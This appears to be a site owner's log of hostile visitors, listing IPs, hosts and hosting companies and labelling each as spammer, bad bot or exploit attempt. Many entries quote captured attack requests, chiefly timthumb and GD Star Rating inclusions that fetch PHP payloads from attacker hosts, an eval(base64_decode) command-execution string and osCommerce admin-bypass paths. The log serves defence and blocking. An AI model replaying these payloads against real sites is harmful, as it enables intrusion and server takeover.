Hosting Company: Spain – Malaga Axarnet Comunicaciones Sl
Multiple brute force attempts at WordPress exploit:
/wp-content/themes/TheStyle/timthumb.php?src=http:
//img.youtube.com.toptutor.hk/upload.php
91.224.160.25 Hostname: hosted-by.bergdorf-group.com
Hosting Company: Netherlands – Amsterdam Bergdorf Group Ltd.
Attempted PHP / SQL admin hack.
/mysqladmin/index.php
/webdb/index.php
/php-myadmin/index.php
71.167.141.45 Hostname: static-71-167-141-45.nycmny.fios.verizon.net
Hosting Company: United States – Pt. Washington Crestwood Computer Corp
Trying osCommerce exploit
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
/admin/file_manager.php/login.php
174.121.194.202 Hostname: new.newsprofession.com
Hosting Company: United States – Dallas Theplanet.com Internet Services Inc.
Attempting “Is-human WordPress Plugin Remote Command Execution Vulnerability”
Mail Server and Dictionary Attacker
27.159.216.227 UA: Opera/9.80 (Windows NT 6.1; WOW64; U; ru) Presto/2.10.229 Version/11.64 Comment spammer
202.98.203.252 Registrar: China Guiyang Chinanet Guizhou Province Network
UA: Opera/9.80 (Windows NT 6.1; U; MRA 6.0 (build 5680); ru) Presto/2.10.289 Version/12.00
Comment spammer – found my honeypot trap file
91.207.7.190 Hostname: 190.7.207.91.unknown.steephost.net Comment spammer – found my honeypot trap file
184.173.2.190 Hostname: wealthworld.wealthworld.com
United States – Dallas Theplanet.com Internet Services Inc.
Looking to exploit WordPress timthumb vulnerability scanner plugin
//wp-content/plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php?
src=http: //flickr.com.alba-sport.net/bad.php
200.98.68.236 Hostname: 200-98-68-236.clouduol.com.br Looking for exploit in WordPress Timthumb Vulnerability Scanner Plugin
//wp-content/plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php?
src=http: //wordpress.com.alumnipmc.com/index.php
81.17.21.156 Hostname: virtu.ir
Hosting Company: Switzerland – Meinier Client
Attempting timthumb exploit:
/wp-content/gd-star-rating/timthumb.php?src=http: //flickr.com.aksiadam.net/byroe.php
121.246.86.37 Hostname: 121.246.86.37.static-ahmedabad.vsnl.net.in
Hosting Company: India – Ahmedabad Internet Service Provider
Comment Spammer, Spam Harvester, Mail Server, Dictionary Attacker
173.213.97.20 Spammer. Tried to post comments and register new account on restricted site.
64.120.63.96 Hostname: 64.120.63.96.rdns.ubiquityservers.com
Hosting Company: United States – Dover Nobis Technology Group Llc
Comment Spammer:
Sample message text: “Spot on with this write-up, I actually believe this website …”
Link URL: http: //expertdecoders.com
Name: bypasscaptcha key
e-mail: jess_yamamoto@t-online.de
173.213.108.105 Hosting Company: United States- Lilburn Infinitie Networks Cloud Vps Comment Spammer:
Sample message: I do believe this is a great blog. I stumbledupon it 😉
I’m going to revisit yet again since I bookmarked it. Money and freedom is the best way to change,….
Name: jdownloader captcha
e-mail: ivorysebastian@t-online.de
198.15.126.157 Hosting Company: United States – Phoenix Secured Servers Llc Comment Spammer
178.137.161.214 Hostname: 178-137-161-214-lvv.broadband.kyivstar.net
Hosting Company: Ukraine – Kiev Kyivstar Gsm
Trying to access wp-login.php
/admin.php
/administrator/index.php
63.247.68.181 Hosting Company: United States – Atlanta Global Net Access Llc Looking for WordPress GD Star Rating plugin vulnerability:
/wp-content/gd-star-rating/timthumb.php?
src=http%3A%2F%2Fflickr.com.colortemplates.in%2Fbad.php
85.214.234.56 Hostname: h1867931.stratoserver.net
Hosting Company: Germany – Berlin Strato Ag
Looking for WordPress GD Star Rating plugin vulnerability
//wp-content/gd-star-rating/?src=http: //flickr.com.twinsticktours.com/simple.php
80.48.31.188 Hostname: 188.rev.iat.pl
Hosting Company: Poland – Telekomunikacja Polska S.a.
Looking for WordPress GD Star Rating plugin vulnerability
//wp-content/gd-star-rating/?src=http: //flickr.com.bliskoboga.waw.pl/bot.php
190.120.238.137 Hosting Company: Panama – Panama Infolink Panama Corp. Looking for WordPress GD Star Rating plugin vulnerability
//wp-content/gd-star-rating/?src=http: //img.youtube.com.toptutor.hk/upload.php
37.59.49.11 Hostname: clientsrv03.dzservices.net
Hosting Company: France – Roubaix Ovh Sas
Looking for WordPress GD Star Rating plugin vulnerability
//wp-content/gd-star-rating/?src=http: //img.youtube.com.toptutor.hk/upload.php
173.236.67.101 Hostname: node1.hhwebsites.net
Hosting Company: United States – Chicago Singlehop Inc.
Attempting WordPress Is-Human plugin exploit
/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZW
NobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK));error
119.82.66.137 Hosting Company: India Noida Spectra Isp Networks Private Limited Spammer
87.238.162.146 Hostname: vz10.stone-is.net
Hosting Company: Belgium Brussels Stone Internet Services Bvba
Attempting osCommerce/wpOnlineStore/Zencart exploit:
/admin/categories.php/login.php
/admin/file_manager.php/login.php
184.22.108.73 Hostname: 184-22-108-73.static.hostnoc.net
Hosting Company: United States – Leesburg Network Operations Center Inc
Numerous attempts to create user account:
account/register.php
user/register
tools/quicklogin.one and more
Also – /+encodeURIComponent(location.href)+
87.205.101.134 Hostname: 87-205-101-134.adsl.inetia.pl
Hosting Company: Poland Netia Sa
Mail Server, Spammer
Banned for looking for non-existent file: mobiquo.php
38.113.234.180 Hostname: crawl0.kosmix.com
Hosting Company: United States – San Bruno Kosmix Corporation
Kosmix Search Engine:
Rule breaker: ignores robots.txt rules. Fails to get robots.txt,
Does not identify itself with a User Agent
38.99.97.38 Hostname: h-97-38.scoutjet.com
UA: Mozilla/5.0 (compatible; Blekkobot; ScoutJet; +http: //blekko.com/about/blekkobot)
Mozilla/5.0 (compatible; ScoutJet; +http: //www.scoutjet.com/)
Hosting Company: United States – Annapolis Blekko
Blekkobot
Bad spider. Rule Breaker.
No value as traffic referrer
94.23.238.52 Hostname: ns308573.ovh.net
Hosting Company: France – Roubaix Ovh Sas
Bad activity detected – looks like Apache server script injection attempt:
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_
REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=test??
91.142.217.24 Hostname: vps314.singularweb.com
Company: Spain – Malaga Axarnet Comunicaciones Sl
WordPress timthumb exploit attempt:
//wp-content/themes/meintest/layouts/thumb.php?src=http:
//picasa.com.amisenscene.fr/countxx.php
94.228.34.248 UA: magpie-crawler/1.1 (U; Linux amd64; en-GB; +http: //www.brandwatch.net) Scraper
69.175.22.170 Hostname: vps01.ravenoushosting.com
Company: United States – Chino Hills Singlehop Inc.
Trackback Spammer/Comment Spammer
Looking for xmlrpc.php
188.138.244.205 Hostname: 188-138-244-205.starnet.md
Company: Moldova, Republic Of – Chisinau Starnet S.r.l
Numerous login attempts:
/wp-login.php?action=register
/login.php
/signup.php
212.48.66.208 Hostname: vps10861750.123-vps.co.uk
Company: United Kingdom – Derby Webfusion Internet Solutions
Israel IP
Attempting timthumb exploit:
/wp-content/plugins/extend-wordpress/helpers/thumbopen.php?src=http:
//blogger.com.mesutpinar.com/file.php
Blocked by htaccess script – Subsequently banned
Attempted osCommerce/wpOnlineStore exploit
/admin/categories.php/login.php?cPath=&action=new_product_preview
208.83.235.116 Company: United States – San Clemente Marketing Star Attempting osCommerce/wpOnlineStore exploit
/admin/categories.php/login.php?cPath=&action=new_product_preview
85.214.219.159 Hostname: h2017438.stratoserver.net
Company: Germany – Berlin Strato Ag
Attempting osCommerce/wpOnlineStore exploit
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/file_manager.php/login.php
97.76.0.78 Hostname: rrcs-97-76-0-78.se.biz.rr.com
Company: United States – Orlando Road Runner Holdco Llc
Attempting hack / wpOnlineStore/osCommerce exploit
/admin/sqlpatch.php/password_forgotten.php?action=execute
/admin/record_company.php/password_forgotten.php
69.50.197.238 Hostname: aws.tomalish.net
Company: United States – Huntersville Atjeu Publishing Llc
Attempted WordPress GD Star Rating plugin exploit:
//wp-content/gd-star-rating/?src=http: //flickr.com.twinsticktours.com/
simple.php
108.59.11.73 Hostname: 108.59.11.73
Company: United States – Manassas Leaseweb Usa Inc.
Attempted timthumb exploit:
/wp-content/themes/u-design/scripts/timthumb.php?src=http:
//blogger.com.landescapedesigns.com/class-blog.php
Blocked by .htaccess script – subsequently banned
200.98.146.48 Hostname: 200-98-146-48.clouduol.com.br
Company: Brazil – Sao Paulo Universo Online S.a.
Attempted WordPress GD Star Rating plugin exploit:
/wp-content/gd-star-rating/timthumb.php?src=http:
//wordpress.com.scriptjoey.com/joey2.php
192.162.19.194 Company: Ukraine – Rivne Fop Budko Dmutro Pavlovuch
192.162.0.0 – 192.162.255.255 Banned
Comment Spammer
Undesirable Country – UKRAINE
72.172.130.13 Hostname: s13.n130.n172.n72.static.myhostcenter.com
Company: United States – Columbus Jumpline Inc
Attempted timthumb exploit
/content/wp-content/themes/theblock/timthumb.php?src=http:
//blogger.com.landescapedesigns.com/class-blog.php
72.172.130.13 Hostname: pool-96-254-44-124.tampfl.fios.verizon.net
Company: United States – Largo Verizon Online Llc
Malware injection attempt:
/xjs/_/js/hp/sb_he,pcc/rt=j/ver=ekMxmVjFIzI.en_US./d=1/sv=1/rs=AItRSTM0lksRtI2VxMWJM1mGGSAc7V2OnQ
108.62.71.206 Hostname: static-108-62-71-206.nextroute.co
Company: United States – Chicago Ubiquity Server Solutions Chicago
Tried to login to website using non-existent username “janie9”
49.205.197.173 Hostname: ras.beamtele.net
Company: India – Hyderabad Beam Telecom Pvt Ltd
Trying to login/register:
/pg/register
/join.php
130.185.156.232 Company: United States – Buffalo Deepak Mehta Fie Tried to register account:
/user/register
76.73.5.2 Hostname: server2.up4.net
Company: United States – Denver Fdcservers.net
Attempted osCommerce/wpOnlinestore/ZenCart admin exploit
/admin/file_manager.php/login.php
/admin/categories.php/login.php
/banner_manager.php/login.php
Probing for timthumb vulnerability
//wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=http:
//blogger.com.arztree.com/idss.php
Hostname: server2.up4.net
193.104.168.111 Hostname: linux10.mesh-internet.co.uk
Company: United Kingdom – Mesh Internet Ltd
Attempted osCommerce/wpOnlinestore/ZenCart admin exploit
/admin/file_manager.php/login.php
/admin/categories.php/login.php
/banner_manager.php/login.php
69.175.22.170 Hostname: vps01.ravenoushosting.com
Company: United States – Chino Hills Singlehop Inc.
Comment/Trackback Spammer:
Sample message: sports betting…
URL link: www DOT betxchange.co.za/
83.23.141.139 Hostname: dfl139.neoplus.adsl.tpnet.pl
Company: Poland – Telekomunikacja Polska S.a.
Attempting to access admin and register on site
/wp-login.php?action=register
/wp-login.php?registration=disabled
/dodaj,strone/
/admin/
68.67.77.60 Hostname: server1.bytegrafix.in Attempting WordPress GD Star Rating plugin / timthumb exploit
wp-content/gd-star-rating/?src=http: //picasa.com.deanswebsite.org/thumb.php
//wp-content/gd-star-rating/?src=
174.122.61.13 Hostname: acc.accentscityinternational.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Attempting wpOnlineStore/osCommerce exploit
/admin/categories.php/login.php
50.97.138.110 Hostname: drawer.mysitehosted.com
Company: United States – Dallas Softlayer Technologies Inc.
Attempting wpOnlineStore/osCommerce exploit
/admin/categories.php/login.php
222.122.142.233 Company: Korea, Republic Of Seoul Korea Telecom Server directed injection attempt
///?_SERVER[DOCUMENT_ROOT]=
http: //board.kcm.co.kr///skin/zero_vote/images/t.gif??
/security//?_SERVER[DOCUMENT_ROOT]=
http: //board.kcm.co.kr///skin/zero_vote/images/t.gif??
198.15.126.172 Company: United States Phoenix Secured Servers Llc Comment Spammer
Found honeypot trap file
204.124.181.122 Hostname: www1.tennismatch.cc
Company: United States Scranton Volumedrive
Trying to register account on restricted site:
/?q=user/register
/user/register
189.76.176.10 Hostname: cpanel.visaonet.com.br
Company: Brazil – Sao Paulo Visaonet Telecom Ltda.
Attempted wpOnlineStore/osCommerce exploit
/admin/categories.php/login.php
/admin/categories.php/login.php?cPath=&action=new_product_preview
211.142.236.132 Company: China – Changsha China Mobile Communications Corporation – Hunan Comment Spammer
Looking for comment forms: article URL/+Result:+it+is+not+a+forum+/+guestbook+%28or+no+connection+to+internet%29
27.24.159.206 Company: China Wuhan Chinanet Hubei Province Network Spammer looking for comment forms: article URL/+Result:+it+is+
not+a+forum+/+guestbook+%28or+no+connection+to+internet%29
122.72.76.133 China – Beijing China Tietong Telecommunications Corporation Comment Spammer
Looking for comment forms: article URL/+Result:+it+is+not+a+forum+/+guestbook+%28or+no+connection+to+internet%29
122.72.80.101 China – Beijing China Tietong Telecommunications Corporation Comment Spammer
Looking for comment forms: article URL/+Result:+it+is+not+a+forum+/+guestbook+%28or+no+connection+to+internet%29
124.160.147.173 Company: China – Hangzhou China Unicom Zhejiang Province Network Comment Spammer
Looking for comment forms: article URL/+Result:+it+is+not+a+forum+/+guestbook+%28or+no+connection+to+internet%29
124.160.147.165 Company: China – Hangzhou China Unicom Zhejiang Province Network Comment Spammer
Looking for comment forms: article URL/+Result:+it+is+not+a+forum+/+guestbook+%28or+no+connection+to+internet%29
123.129.240.171 Company: China – Jinan Jinanidc Hexun Comment Spammer
Looking for comment forms: article URL/+Result:+it+is+not+a+forum+/+guestbook+%28or+no+connection+to+internet%29
218.93.127.121 Company: China – Nanjing Chinanet Jiangsu Province Network Comment Spammer
109.200.9.194 Hostname: webserver01.kapang.com
Company: United Kingdom – Gosport Redstation Limited
Attempting wpOnlineStore/osCommerce exploit
/admin/categories.php/login.php
/admin/categories.php/login.php?cPath=&action=new_product_preview
173.213.108.106 Company: United States – Lilburn Infinitie Networks Cloud Vps Comment Spammer – uses CAPTCHA bypass – jdownloader captcha
(http: //bypasscaptcha.net/)
168.172.0.254 Hostname: vpnpta.tut.ac.za
Company: South Africa – Johannesburg Technikon Pretoria
Mail Server, Dictionary Attacker
Probing for vulnerabilities: /mt-static/js/tc/client.js
202.191.56.207 Company: Viet Nam Ha Noi Hanoi University Of Technology Looking for WordPress timthumb vulnerability
//versitility/timthumb.php?src=http: //img.youtube.com.toptutor.hk/upload.php
85.236.51.26 Hostname: 26-51-236-85.rev.customer-net.de
Company: Germany – Holzkirchen Scope Xl
Attempting wpOnlineStore/osCommerce exploit:
/admin/file_manager.php/al.shaena.php
/admin/categories.php/al.shaena.php?cPath=&action=new_product_preview
/admin/banner_manager.php/al.shaena.php
91.207.5.214 Hostname: reverse.214.5.207.91.reserver.ru
Company: Ukraine Kharkiv Pp Andrey Kiselev
Looking for WordPress timthumb vulnerability
//wp-content/themes/LondonLive/thumb.php?
src=http: //img.youtube.com.precastsystemsinc.com/index2.php
221.238.12.243 Hostname: 243.12.238.221.broad.tj.tj.dynamic.163data.com.cn
Company: China – Tianjin Geli Ltd
Mail server, Dictionary Attacker, Comment Spammer
Found Honeypot trap file
198.15.124.78 Company: United States – Phoenix Secured Servers Llc Comment Spammer
88.119.188.237 Company: Lithuania – Kaunas Teo Lt Ab Attempting WordPress GD Star Rating plugin exploit
//wp-content/gd-star-rating/?
src=http: //img.youtube.com.fitnessmundo.net/func.php
199.19.110.146 Company: United States – Scranton Leyton Reed Comment Spammer
109.104.78.114 Hostname: lvps109-104-78-114.vps.webfusion.co.uk
Company: United Kingdom – Derby Webfusion Internet Solutions
Attempting timthumb exploit:
/wp-content/plugins/styles-with-shortcodes/includes/timthumb.php?src=http: //wordpress.company.patoatomico.com.br/wp-login.php
76.87.83.30 Hostname: cpe-76-87-83-30.socal.res.rr.com
Company: United States – Los Angeles Road Runner Holdco Llc
Multiple attempts on wp-signup
64.15.156.57 Hostname: not-assigned.privatedns.com
Company: Canada – Montreal Iweb Dedicated Cl
Attempting ZenCart/osCommerce/wpOnlineStore admin script injection exploit
/extras/curltest.php
/admin/sqlpatch.php/password_forgotten.php?action=execute
198.144.116.2 Company: United States Torrance Giglinx Inc. Comment Spammer
Tried to force account registration – /index.php?do=/user/register/
198.15.122.186 Company: United States – Phoenix Secured Servers Llc Comment spammer
Found Honeypot trap file
198.15.126.163 Company: United States – Phoenix Secured Servers Llc Comment spammer
Found Honeypot trap file
198.15.126.155 Company: United States – Phoenix Secured Servers Llc Comment spammer
Found Honeypot trap file
89.145.95.2 UA: Mozilla/5.0 (compatible; GrapeshotCrawler/2.0; +http //www grapeshot.co.uk/crawler.php)
Hostname: www grapeshot.co.uk
Company: United Kingdom – London Grapeshot Ltd
Grapeshot Crawler Bot:
Rulebreaker – gets then ignores robots.txt
219.94.169.50 Company: Japan – Sakura Sakura Internet Inc. Mail Server
Attempting ZenCart/osCommerce/wpOnlineStore admin script injection exploit
admin/sqlpatch.php/password_forgotten.php
190.158.236.98 Hostname: Static-IP-cr19015823698.cable.net.co
Company: Colombia – Bogota Telmex Colombia S.a.
Comment Spammer
174.142.246.33 Hostname: not-assigned.privatedns.com
Company: Canada – Montreal Serversp
Attempting ZenCart/osCommerce/wpOnlineStore admin script injection exploit
/admin/sqlpatch.php/password_forgotten.php?action=execute
108.62.71.241 Hostname: static-108-62-71-241.nextroute.co
Company: United States – Chicago Ubiquity Server Solutions Chicago
Comment Spammer using CAPTCHA bypass tools
199.19.110.147 Company: United States – Scranton Leyton Reed Comment Spammer
103.9.103.131 Hostname: duck.vodien.com
Company: Singapore – Singapore Vodien Internet Solutions Pte Ltd
Hacker
/%22radykal-fancy-gallery%22http: //flicker.com.flaplight.net/bot.txt??
&sa=U&ei=g87BUKiPN8eH4AT6vIGgBg&ved=0CGsQFjAmOKwC&usg=AFQjCNEYA7qtKBy6EwbkfOx9GVhxZLZEdw/%22radykal-fanc
/%22radykal-fancy-gallery%22test??
UA: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
67.225.163.95 Hostname: host.bsncaribbean.net
Company: United States – Lansing Liquid Web Inc.
Attempted timthumb exploit:
//wp-content/themes/Quadro/timthumb.php?
src=http: //blogger.com.advcycles.com/xx.php
//wp-content/themes/Quadro/timthumb.php?
src=http: //blogger.com.advcycles.com/bot.php
//wp-content/themes/Quadro/timthumb.php?
src=http: //blogger.com.advcycles.com/user.php
Appeared to be botnet brute force or DDOS attack with +200 hundred attempts in 3 minutes from this IP, along with similar activity from about other IPs
Previous sighting
/wp-content/themes/object/thumb.php?
src=http: //picasa.com.juicycouture.com.au/xx.php
//wp-content/themes/object/thumb.php?
src=http: //picasa.com.juicycouture.com.au/bot.php
//wp-content/themes/object/thumb.php?
src=http: //picasa.com.juicycouture.com.au/user.php
74.91.27.82 Hostname: compwxr.com
Company: United States – Kansas City Alec Istomin
Trying to register account:
/user/register
/?q=user/register
68.71.50.245 Company: Canada – Montreal Netelligent Hosting Services Inc. Attempted osCommerce/wpOnlineStore exploit:
/admin/file_manager.php/login.php
/admin/banner_manager.php/login.php
91.236.74.110 Company: Poland – Przedsiebiorstwo Uslug Specjalistycznych Elan Mgr Inz. Andrzej Niechcial Comment Spammer:
Tried several times to register account on restricted site
199.19.109.122 Company: United States – Scranton Volumedrive Spam-Bot trying to post comment
180.76.5.155 UA: Mozilla/5.0 (compatible; Baiduspider/2.0; +http: //www.baidu.com/search/spider.html)
Hostname: baiduspider-180-76-5-155.crawl.baidu.com
Another Baidu Search engine IP
71.8.242.4 Hostname: cent6.vistabeam.com
Company: United States Mitchell Vistabeam
Attempting WordPress Is-Human plugin vulnerability exploit
//wp-content/plugins/is-human/thumb.phptimthumb.php?
src=http: //gardengateneedlepoint.com/store/pub/a.php
//wp-content/plugins/is-human/thumb.php.cache/
c54af1d13e884a4c63da8f3098a7a4da.php
168.144.144.42 Hostname: vps-1117313-13475.manage.myhosting.com
Company: Canada – Toronto Softcom Technology Consulting Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php
/admin/file_manager.php/login.php
/admin/banner_manager.php/login.php
147.222.2.1 Hostname: barney.gonzaga.edu
Company: United States – Spokane Gonzaga University
Attempting WordPress Is-Human plugin vulnerability exploit
//wp-content/plugins/is-human/thumb.php?
src=http: //blogger.com.gilacode.org/x.php
54.242.154.11 Hostname: ec2-54-242-154-11.compute-1.amazonaws.com
Company: United States – Ashburn Amazon.com Inc.
Looking for CSS files. No referrer. Assume trying to use site as free CDN
BANNED
89.16.173.60 Hostname: filmvideo.vm.bytemark.co.uk
Company: United Kingdom – York Bytemark Computer Consulting Ltd
Attempted timthumb exploit:
//wp-content/themes/canvas/thumb.php?
src=http: //flickr.com.sentient.pk/jahat.php
96.47.226.22 Hostname: wannabe.torservers.net Comment Spammer
74.120.15.150 Hostname: manning1.torservers.net (maybe faked)
Hostname: raskin.torservers.net
Company: Germany Dresden Torservers.net
Comment Spammer
173.254.192.36 Hostname: manning1.torservers.net (maybe faked)
Hostname: 173.254.192.36.zbusa.com
Company: Germany Dresden Torservers.net
Comment Spammer
85.25.145.90 Hostname: golf835.server4you.de
Company: Germany – Frankfurt Am Main Intergenia Ag
Attempted timthumb exploit:
//wp-content/themes/Quadro/timthumb.php?
src=http: //img.youtube.com.fitnessmundo.net/func.php
198.24.140.179
198.24.140.154
198.24.140.170
Company: United States – Phoenix Secured Servers Llc Comment Spammer – found honeypot trap file
124.124.58.149 Company: India Mumbai – Reliance Infocomm Ltd Internet Data centre Mail server / Dictionary Attacker
Tried logging in to site admin
213.181.73.145 Company: Spain Murcia Producmedias.l.u. Comment Spammer
23.19.72.239 Company: United States Phoenix Nobis Technology Group Phoenix Comment Spammer
199.180.131.9 Hostname: server.impjoyas.info
Company: United States – Lawrence Dnsslave.com
Comment Spammer
173.213.108.135 Company: United States – Lilburn Infinitie Networks Cloud Vps Comment Spammer – uses CAPTCHA BYPASS software
23.19.92.12 Hostname: 23.19.92.12.rdns.ubiquity.io
Company: United States – Phoenix Nobis Technology Group Phoenix
Comment Spammer
12.181.204.36 Hostname: vpn.catalent.com
Company: United States – Hillsboro Atos Origin
Mail Server and Comment Spammer
188.143.232.153 Company: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd. Comment Spammer
Brute Force login attacker
Hacker – attempted to access MyPHP, MySQL admin:
/dbadmin/index.php
/PMA/index.php
/myadmin/index.php
/php-my-admin/index.php
/sqlmanager/index.php and others
46.229.160.172 Website: webstatsdomain.com
Hosted by: United States – Advanced Hosters
Spy Website.
Creates numerous btoken URLS in Google index
83.46.171.1 Hostname: 1.Red-83-46-171.dynamicIP.rima-tde.net
Company: Spain Madrid Telefonica De Espana Sau
Comment Spammer
Mail Server
173.213.108.161 Company: United States Lilburn Infinitie Networks Cloud Vps Comment Spammer using CAPTCHA BYPASS tools
211.172.241.50 Hostname: hostingnara.com
Company: Korea, Republic Of – Seoul Korea Internet Data Center Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php
/admin/file_manager.php/login.php
/admin/banner_manager.php/login.php
23.23.210.210 Hostname: ec2-23-23-210-210.compute-1.amazonaws.com
Company: United States Ashburn Amazon.com Inc.
Attempted timthumb exploit:
//wp-content/themes/theblock/timthumb.php?src=http: //wordpress.com.community.ingatlanajandekozas.hu/img.php
216.70.89.79 Hostname: thingsithinkabout.com
Company: United States – Culver City Media Temple Inc.
Attempted WordPress GD Star Rating plugin exploit
//wp-content/gd-star-rating/
?src=http: //flickr.com.mercadodecorotos.com/index.php
Attempted timthumb exploit:
/wp-content/plugins/timthumb-vulnerability-scanner/
cg-tvs-admin-panel.php?src=http%3A%2F%2Fflickr.com.
beatmaking-software.net%2Fvera.php
46.45.171.154 Hostname: 46-45-171-154.turkrdns.com
Company: Turkey – Istanbul Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti.
Attempted WordPress GD Star Rating plugin exploit
//wp-content/gd-star-rating/?
src=http: //flickr.com.mercadodecorotos.com/index.php
Simultaneous attack with 216.70.89.79
78.158.11.226 Hostname: cl-78-158-11-226.fastlink.lt
Company: Lithuania – Vilnius Uab Consilium Optimum
Rule Breaker
63.143.50.149 Hostname: thx.asmaislinda.com
Company: United States – Dallas Limestone Networks Inc.
Hacker:
//albizia/includes?src=http%3A//img.youtube.com.toptutor.hk/upload.php
//wp-content/plugins/wp-pagenavi?
src=http%3A//img.youtube.com.toptutor.hk/upload.php
173.212.198.44 Hostname: 173-212-199-44.hostnoc.net
Company: United States – Scranton Network Operations Center Inc.
Comment Spammer
/wp-comments-post.php
50.17.163.159 Hostname: ec2-50-17-163-159.compute-1.amazonaws.com
Company: United States – Ashburn Amazon.com Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php
85.159.68.58 Hostname: mail.ozhat.com.tr
Company: Turkey Istanbul Cizgi Telekomunikasyon Hizmetleri Sanayi Ve Ticaret Limited Sirketi
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php
62.205.10.72 Hostname: mail.puntoweb.net
Company: Italy – Pisa Dev Italia Srl
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/categories.php/login.php
131.234.144.185 Hostname: unisport.uni-paderborn.de
Company: Germany – Paderborn Universitaet Paderborn
Attempted wpOnlineStore/osCommerce/Zencart exploit
//admin/categories.php/login.php?cPath=&action=new_product_preview
93.186.180.251 Hostname: jaggledell.oxilion.nl
Company: Netherlands – Enschede Oxilion B.v.
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/banner_manager.php/login.php
149.126.19.106 Hostname: 149-126-19-106.obit.ru
Company: Russian Federation – Saint Petersburg Obit-telecommunications Ltd.
Mail Harvester/ Mail Spammer
64.207.179.177 Company: United States – Santa Monica Media Temple Inc. Attempted wpOnlineStore/osCommerce/Zencart exploit
//admin/categories.php/login.php?cPath=&action=new_product_preview
62.193.235.191 Hostname: wpc2395.amenworld.com
Company: France – Paris Amen
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/file_manager.php/login.php
/admin/banner_manager.php/login.php
/admin/categories.php/login.php
187.60.44.240 see next Company: Brazil – Sao Paulo Infoway Servicos De Informatica Ltda
Webserver: 2 websites – jebnet.com.br , yasnet.com.br
Attempted wpOnlineStore/osCommerce/Zencart exploit
//admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
198.24.138.29 Company: United States – Phoenix Secured Servers Llc Comment Spammer:
Found Honeypot trap file
198.15.126.170 Company: United States – Phoenix Secured Servers Llc Comment Spammer:
Found Honeypot trap file
108.27.246.58 Hostname: pool-108-27-246-58.nycmny.fios.verizon.net
Company: United States New York City Verizon Online Llc
Comment Spammer / Trackback Spammer
Looked for non existent xmlrpc.php file (WordPress trackbacks)
173.255.240.241 Hostname: li250-241.members.linode.com BANNED HOST – members.linode.com
Only ever seen pings on the domain from any IP from members.linode.com.
Pages never get viewed – Resource Waster
208.131.138.16 Hostname: dl17.ymgg.us
Company: United States – New York City Westhost Inc.
Attempting Uploadify exploit
/scripts/uploadify/uploadify.css?
173.203.240.55 Hostname: st5x002.newhostingaccount.net
Company: United States – San Antonio Rackspace Hosting
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/banner_manager.php/login.php
217.171.192.34 Hostname: www1.monsternett.no
Company: Norway – As Monsternett As Halden Norway
Attempted wpOnlineStore/osCommerce/Zencart exploit
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
108.170.58.34 Company: United States – Phoenix Secured Servers Llc Attempted WordPress GD Star Rating plugin exploit
//wp-content/gd-star-rating/?src=http: //wordpress.com.ori-beauty.co.uk/eva.php
81.144.138.34 Hostname: crawl-81-144-138-34.wotbox.com
Company: United Kingdom – Newport Ayima Ltd
UA: Wotbox/2.01 (+http: //www.wotbox.com/bot/)
Mail Server / Dictionary Attacker
Resource waster bot
Rule Breaker
91.224.246.150 Company: Latvia Riga – Sia Teronet Comment Spammer
Found Honeypot trap file
216.99.157.213 Hostname: unassigned.psychz.net
Company: United States – New York City Psychz Networks
Comment Spammer
Tried to access folder directory
110.85.127.53 Company: China – Putian Chinanet Fujian Province Network Comment Spammer
50.116.10.252 Hostname: li456-252.members.linode.com BANNED HOST – members.linode.com
85.25.145.54 Hostname: golf835.server4you.de
Company: Germany – Frankfurt Am Main Intergenia Ag
Attempted WordPress GD Star Rating plugin and timthumb exploit
/!tim%20wp-content/gd-star-rating/timthumb.php
?src=http%3A%2F%2Fflickr.com.machine-a-barbe-a-papa.fr%2Fbad.php
[URL]/&sa=U&ei=iP_OUMTRCZDNswaSiICQDw&ved=0CCkQFjAE&usg=
AFQjCNESN5n-L__IUh9CO9R2T8_GB2-6kw/!tim%20wp-content/
91.232.96.29 Company: Germany – Xirra Gmbh Comment Spammer:
Looking for forums in several languages
/forum/
/foro/
/forums/
173.203.241.166 Hostname: st5x002.newhostingaccount.net
Company: United States – San Antonio Rackspace Hosting
Attempted timthumb exploit:
/wp-content/themes/primely-theme/scripts/timthumb.php?src=http%3A%2F%2Fwordpress.com.slotscasino-online.com/ozawa.php
212.66.34.43 Hostnames: mshayem.com
lookmy2.ints.net
Company: Ukraine – Donets’k Data Internet Ltd
Comment Spammer
Attempted WordPress GD Star Rating plugin exploit
//wp-content/gd-star-rating/?src=http: //picasa.com.thecleanhouse.cl/google.php
216.152.249.243 Company: United States – Santa Monica Xeex Comment Spammer
[ARTICLE URL]/%2B/%22add%2Bwebsite/%22%2B%2B%2Bgeneration&ct=clnk
/wp-comments-post.php
208.131.138.19 Hostname: aaa1.buyalot.cn
Company: United States – New York City Westhost Inc.
Comment Spammer
93.182.134.194 Hostname: anon-134-194.relakks.com
Company: Sweden – Lund Viaeuropa I Lund Ab
Comment Spammer
Found Honeypot Trap file
ANOTHER relakks.com host BAD IP
189.15.122.187 Hostname: 189-015-122-187.xd-dynamic.ctbcnetsuper.com.br
Company: Brazil – Sao Paulo Companhia De Telecomunicacoes Do Brasil Central
